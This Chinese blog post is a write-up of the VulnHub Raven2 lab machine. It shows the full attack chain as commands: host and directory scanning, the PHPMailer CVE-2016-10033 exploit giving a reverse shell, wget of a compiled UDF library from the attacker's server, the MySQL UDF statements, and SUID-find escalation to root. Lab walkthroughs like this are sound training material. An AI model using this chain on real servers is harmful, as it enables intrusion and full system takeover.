美文网首页
VulnHub渗透测试-Raven2.ova靶机

VulnHub渗透测试-Raven2.ova靶机

作者: ESE_ | 来源:发表于2019-07-16 14:28 被阅读0次

环境

Winodws10 x64
Oracle VM
Raven2.ova 靶机

靶机下载,利用Oracle VM打开靶机,进行测试。

主要内容

1、主机发现,建议使用nmap (netdiscover经常扫描不出来)、目录爆破,建议使用kali下的gobuster (windows下的御剑字典不是很全)
2、phpmailer远程代码执行漏洞(CVE-2016-10033)利用,反弹shell
3、查看wordpress的wp-config.php配置文件得到数据库账号密码,mysql数据库UDF提权(CVE-2016-6662)

一、测试步骤

1、利用nmap进行主机发现nmap -sn 192.168.3.1/24(建议使用kali下的,我使用过win下的,贼慢)

nmap

访问192.168.3.54,查看源代码,没有发现为什么信息,利用gobuster(下载)进行目录爆破./gobuster -u http://192.168.3.54 -wpy/usr/share/wordlists/dirb/common.txt

gobuster

访问目录,得到flag1,同时发现网站目录位置:

vendor,flag1

发现有网站目录下还有PHPMailerAutoload.phpVERSION,查看VERSION发现是5.2.16

2、利用kali搜索PHPMailer的相关漏洞,searchsploit phpmailer

phpmailer

发现phpmailer版本5.2.16,可以利用,这里选择/usr/share/exploitdb/exploits/php/webapps/40974.py目录下的python脚本CVE-2016-10033(个人感觉python未来语言)

payload

脚本开始加上# -*- coding: utf-8 -*-防止编码报错。运行python 40974.py

40974.py

构造好网页,点击http://192.168.3.54/contact.php触发生成log1n.php,kali监听4444端口,访问http://192.168.3.54/log1n.php

log1n.php

用python切换到交互shellpython -c 'import pty;pty.spawn("/bin/bash")'

kali

全局搜索find / -name "flag*" | grep -v Permission | grep -v "No such"

image.png

直接查看得到flag2,访问flag3图片可得flag3。

3、利用LinEnum查看linux信息,查看wordpress中wp-config.php配置cat wp-config.php

image.png

登录数据库mysql –u root -p进行登录,查看数据库版本,

login

发现可对数据库进行提权,kali下载提权CVE-2016-6662

wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o  raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so eseudf.so

自己搭建服务器(看雪的KSA),将wget http://xx.xx.xx.xx/eseudf.so下载,将其移动到/tmp目录下。进入数据库开始提权准备

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/tmp/eseudf.so'));
insert into foo values(load_file('/tmp/eseudf.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/eseudf.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/eseudf.so';
Query OK, 1 row affected (0.00 sec)

mysql> create function do_system returns integer soname 'eseudf.so';
create function do_system returns integer soname 'eseudf.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+-----------+----------+
| name      | ret | dl        | type     |
+-----------+-----+-----------+----------+
| do_system |   2 | eseudf.so | function |
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.00 sec)

mysql> exit;

最后进行提权find / -exec "/bin/sh" \;

root

完成测试。

相关文章

  • VulnHub渗透测试-Raven2.ova靶机

    环境 靶机下载,利用Oracle VM打开靶机,进行测试。 主要内容 一、测试步骤 1、利用nmap进行主机发现n...

  • VulnHub渗透测试-BlackMarket靶机(Web渗透测

    环境 BlackMarket靶机下载主要内容 实战 0x1、寻找靶机ip 启动靶机,配置桥接[如下图2mac]模式...

  • Vulnhub靶机渗透测试——DC-1

    看更多:我的博客 Vulnhub 简介 Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜...

  • BTRsys2

    VulnHub靶机渗透之BTRsys2 1.信息收集 发现主机IP为192.168.65.132 2.nmap端口...

  • Vulnhub靶机:DC-9

    靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 靶机描述:DC-9...

  • CTF-DC8靶机攻防

    靶机下载地址 https://www.vulnhub.com/entry/dc-8,367/ 靶机描述 DC-8 ...

  • VulnHub学习:InfoSecWarrior CTF 202

    前言 本次靶机学习的要点: 发现奇怪点、提权靶机地址:https://www.vulnhub.com/entry/...

  • 渗透测试-靶机Raven

    攻击机 ip:192.168.195.133靶机 ip:192.168.195.139 探测存活主机 root@k...

  • CTF-DC9靶机攻防

    DC9靶机下载地址 https://www.vulnhub.com/entry/dc-9,412/ 靶机描述 De...

  • Vulnhub:hackeme2

    一、前言 通过大量vulnhub受控靶机积累一线攻防经验和技巧。 二、环境 靶机名称:hackeme2 靶机难度:...

网友评论

      本文标题:VulnHub渗透测试-Raven2.ova靶机

      本文链接:https://www.haomeiwen.com/subject/kyaakctx.html